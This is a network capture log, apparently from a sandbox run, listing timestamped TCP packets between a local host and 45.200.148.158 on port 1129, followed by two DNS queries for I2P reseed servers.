                                                                                                                                                Jan 5, 2025 17:49:12.125685930 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.125685930 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.126245022 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.126265049 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.126275063 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.126307964 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.126355886 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.126368046 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.126378059 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.126399994 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.126422882 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.126477003 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.126487970 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.126498938 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.126523018 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.169840097 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.169852972 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.169863939 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.169878006 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.169945002 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.169955015 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.169970989 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.169970989 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.169991016 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.171557903 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.171570063 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.171580076 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.171602011 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.171629906 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.184880018 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.184891939 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.184901953 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.184940100 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.185866117 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.185889959 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.185899973 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.185923100 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.185935974 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.185992002 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.186018944 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.453263998 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.453284979 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.453315973 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.453326941 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.453352928 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.453727007 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.453773975 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.453794956 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.453829050 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.453840017 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.453850985 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.453864098 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.453871965 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.453877926 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.453883886 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.453895092 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.453897953 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.453906059 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.453946114 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.505850077 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.505868912 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.505882025 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.505892992 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.505904913 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.505914927 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.505943060 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.506001949 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.506021023 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.506032944 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.506043911 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.506050110 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.506057978 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.506062031 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.506103992 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.517220020 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.517242908 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.517252922 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.517292023 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.518779993 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.518791914 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.518801928 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.518825054 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.518861055 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.519454002 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.519464970 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.519478083 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.519488096 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.519500017 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.519511938 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.519541025 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.534209967 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.534220934 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.534231901 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.534256935 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.534301996 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.534445047 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.534498930 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.534508944 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.534523010 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.534533024 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.534545898 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.534573078 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.534796000 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.534807920 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.534818888 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.534842968 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.534876108 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.535485029 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.535497904 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.535510063 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.535521984 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.535535097 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.535535097 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.535557985 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.586875916 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.587490082 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.587511063 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.587522984 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.587563038 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.587663889 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.587682009 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.587693930 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.587702036 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.587706089 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.587719917 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.587732077 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.587738991 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.587743044 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.587766886 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.587781906 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.599216938 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.599230051 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.599241018 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.599261999 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.600559950 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.600569963 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.600584984 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.600596905 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.600610018 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.600649118 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.601139069 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.601149082 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.601155996 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.601167917 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.601177931 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.601181030 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.601191044 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.601224899 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.615559101 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.615577936 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.615614891 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.615629911 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.615642071 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.615653992 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.615673065 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.615679979 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.615690947 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.615715027 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.615740061 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.615955114 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.615967035 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.615981102 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.616002083 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.616813898 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.616833925 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.616846085 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.616878033 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.616911888 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.616991043 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.617027044 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.617038965 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.860882998 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.860893011 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.860897064 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.860937119 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.861361027 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.861373901 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.861385107 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.861412048 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.861506939 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.861520052 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.861531973 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.861541986 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.861547947 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.861569881 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.913355112 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913371086 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913394928 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913400888 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913408041 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913413048 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.913420916 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913435936 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913448095 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913460016 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913472891 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913506985 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.913521051 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.928034067 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.928057909 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.928069115 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.928107023 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.928136110 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.928210020 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.928222895 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.928230047 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.928241968 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.928261995 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.928273916 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.928347111 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942075014 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942085981 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942097902 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942111969 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942122936 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942137003 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942158937 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942176104 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942300081 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942313910 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942342997 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942347050 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942383051 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942384958 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942394972 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942406893 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942429066 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942557096 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942572117 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942581892 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942595959 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942616940 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942797899 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942807913 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942819118 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942831039 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942843914 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942846060 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942859888 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942867041 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942873955 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942887068 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942895889 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942924023 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.994751930 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.994764090 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.994815111 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.994842052 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.994961023 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.995006084 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.995847940 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.995922089 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.995933056 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.995944023 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.995956898 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.995970011 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.995989084 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.996016979 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.996130943 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.996170044 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.996181011 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.996217966 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.009790897 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.009835958 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.009859085 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.009870052 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.009880066 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.009893894 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.009903908 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.009903908 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.009933949 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.009979010 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.009990931 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.010003090 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.010025978 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.010056019 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.023917913 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.023937941 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.023948908 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.023981094 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.023991108 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.024022102 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.024068117 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024081945 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024094105 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024106026 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024116993 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024116993 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.024141073 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024148941 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.024158001 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024169922 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024190903 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.024205923 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.024554968 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024565935 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024576902 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024589062 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024599075 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024600029 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.024612904 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024636984 CET497041129192.168.2.545.200.148.158
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 5, 2025 17:49:40.057634115 CET | 192.168.2.5 | 1.1.1.1 | 0x7907 | Standard query (0) | reseed.memcpy.io | A (IP address) | IN (0x0001) | false
Jan 5, 2025 17:49:41.396738052 CET | 192.168.2.5 | 1.1.1.1 | 0xe213 | Standard query (0) | reseed-pl.i2pd.xyz | A (IP address) | IN (0x0001) | false
